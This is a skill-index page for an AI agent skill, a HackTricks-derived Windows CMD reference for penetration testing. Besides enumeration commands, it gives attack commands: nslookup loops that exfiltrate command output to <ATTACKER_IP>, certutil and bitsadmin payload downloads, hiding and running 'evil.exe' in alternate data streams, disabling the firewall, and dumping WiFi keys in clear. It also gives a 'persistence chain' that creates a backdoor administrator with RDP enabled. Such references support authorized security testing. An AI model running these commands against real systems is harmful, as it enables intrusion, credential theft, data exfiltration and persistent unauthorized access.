OpenSkillIndex← back to search

Hacktricks-skills windows-cmd-pentest

Windows Command Line reference for penetration testing and security assessment. Use this skill whenever the user needs Windows CMD commands for reconnaissance, enumeration, privilege escalation, persistence, or post-exploitation activities. Trigger on requests about Windows pentesting, CMD commands, AD enumeration, system info gathering, or Windows security assessment.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/windows-hardening/basic-cmd-for-pentesters/SKILL.MD
source content

Windows CMD Pentesting Reference

A comprehensive command reference for Windows penetration testing and security assessment using native CMD tools.

System Enumeration

Architecture and Version

wmic os get osarchitecture
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic computersystem LIST full

Patches and Updates

wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe list brief

Environment Variables

set

Key variables to check:

  • COMPUTERNAME
    - Computer name
  • TEMP/TMP
    - Temp folder location
  • USERNAME
    - Current username
  • USERPROFILE
    - Home directory
  • windir
    - Windows directory (C:\Windows)
  • LOGONSERVER
    - Domain controller name
  • USERDNSDOMAIN
    - DNS domain name
  • USERDOMAIN
    - Domain name

Disk and Storage

wmic logicaldisk get caption,description,providername
fsutil fsinfo drives

Processes and Services

tasklist /V
tasklist /SVC
net start
wmic service list brief
sc query

Scheduled Tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName

Installed Software

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Active Directory Enumeration

Domain Information

echo %USERDOMAIN%
echo %USERDNSDOMAIN%
echo %logonserver%
gpresult /V
wmic ntdomain list /format:list

User Enumeration

dsquery user
net user /domain
net user <ACCOUNT_NAME> /domain
wmic useraccount list /format:list
wmic sysaccount list /format:list

Group Enumeration

net group /domain
net localgroup administrators /domain
net group "Domain Admins" /domain
net group "domain computers" /domain
net group "Domain Controllers" /domain
wmic group list /format:list

Computer Enumeration

dsquery computer
net view /domain
nltest /dclist:<DOMAIN>

Trust Relationships

nltest /domain_trusts

Query Specific OU

dsquery * "CN=Users,DC=DOMAIN,DC=LOCAL"

User and Group Management

Current User Info

whoami /all
whoami /priv
net user %username%

Local Users

net users
dir /b /ad "C:\Users"
net accounts
wmic USERACCOUNT Get Domain,Name,Sid

Create User

net user [username] [password] /add

Domain User Creation

net user username password /ADD /DOMAIN

Add to Administrators

net localgroup Administrators [username] /add
net group "Domain Admins" username /ADD /DOMAIN

Add to Special Groups

net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Check Logged-in Users

qwinsta
klist sessions

Run as Different User

runas /netonly /user:<DOMAIN><NAME> "cmd.exe"
runas /savecred /user:WORKGROUP\Administrator "<command>"

Credential Discovery

Saved Credentials

cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all
rundll32 keymgr.dll, KRShowKeyMgr

Password Policy

net accounts
net accounts /domain

Network Reconnaissance

Network Configuration

ipconfig /all
route print
arp -a
netstat -ano
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config
Netsh Advfirewall show allprofiles

Disable Firewall

NetSh Advfirewall set allprofiles state off
netsh firewall set opmode disable

Enable Firewall

NetSh Advfirewall set allprofiles state on

Open Ports

netsh advfirewall firewall add rule name="Rule Name" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="Rule Name" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

Enable Remote Desktop

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

Enable Remote Desktop via WMIC

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Enable Remote Assistance

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

Network Shares

net view
net view /all /domain [domainname]
net view \\computer /ALL
net use x: \\computer\share
net share

WiFi Credentials

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

File Operations

Basic Commands

cd
cd C:\path\to\dir
dir
dir /a:h C:\path\to\dir
dir /s /b
time
date
type <file>

Hide/Unhide Files

attrib +h file
attrib -h file

File Permissions

icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME>

Copy to SMB

xcopy /hievry C:\source\path \\10.10.14.13\share\path

Shutdown

shutdown /r /t 0

Download Techniques

BitsAdmin

bitsadmin /create <jobname>
bitsadmin /addfile <jobname> <url> <localpath>
bitsadmin /RESUME <jobname>
bitsadmin /complete <jobname>

CertUtil

certutil.exe -urlcache -split -f "http://<url>/file.exe" <localpath>.exe

CertReq

CertReq -Post -config <url> <localpath>

Alternate Data Streams (ADS)

Detect ADS

dir /r

Read ADS

more file.txt:ads.txt
powershell (Get-Content file.txt -Stream ads.txt)

Write to ADS

type C:\temp\evil.exe > "C:\path\logfile.log:evil.exe"
certutil.exe -urlcache -split -f <url> c:\temp:streamname

Extract from ADS

expand c:\ads\file.txt:test.exe c:\temp\evil.exe

Execute from ADS

wmic process call create "'C:\path\file.log:evil.exe'"
powershell -ep bypass - < c:\temp:streamname

DNS Exfiltration

Send Command Output via DNS

for /f %a in ('whoami') do nslookup %a <ATTACKER_IP>
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <ATTACKER_IP>
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <ATTACKER_IP>

Handle Spaces in Paths

for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <ATTACKER_IP>

Redirect and Exfiltrate

whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <ATTACKER_IP>

Bypass Techniques

Character Blacklisting

echo %HOMEPATH:~6,-11%   # Outputs backslash
who^ami   # Bypasses whoami

Error Messages

net helpmsg <error_code>

URL ACLs

netsh http show urlacl

Persistence Quick Reference

Full Persistence Chain

net user hacker Hacker123! /add & \
net localgroup administrators hacker /add & \
net localgroup "Remote Desktop Users" hacker /add & \
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & \
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & \
netsh firewall add portopening TCP 3389 "Remote Desktop" & \
netsh firewall set service remoteadmin enable

Common Reconnaissance Patterns

Quick System Info

hostname & systeminfo | findstr /B /C:"OS Name" /C:"OS Version" & whoami /all

Quick Domain Info

echo %USERDOMAIN% & echo %logonserver% & net user /domain | findstr /v "------------"

Quick Network Info

ipconfig /all & netstat -ano | findstr LISTENING

Quick Privilege Check

whoami /priv | findstr /i "enable"

Tips

  1. Use 
    2>nul
     to suppress error messages when commands might fail
  2. Use 
    findstr
     to filter output for specific keywords
  3. Use 
    ^
     to escape special characters in commands
  4. Use 
    &
     to chain multiple commands on one line
  5. Use 
    |
     to pipe output between commands
  6. Check 
    LOLBAS
     (https://lolbas-project.github.io/) for more living-off-the-land binaries
  7. Use short paths (e.g., 
    Progra~2
    ) when dealing with spaces in paths
  8. Save output to files for later analysis: 
    command > output.txt

When to Use This Skill

Use this skill when you need:

  • Windows CMD commands for penetration testing
  • Active Directory enumeration techniques
  • System reconnaissance on Windows targets
  • Privilege escalation command references
  • Persistence mechanism examples
  • Network share and credential discovery
  • File operation commands for Windows
  • Bypass techniques for restricted environments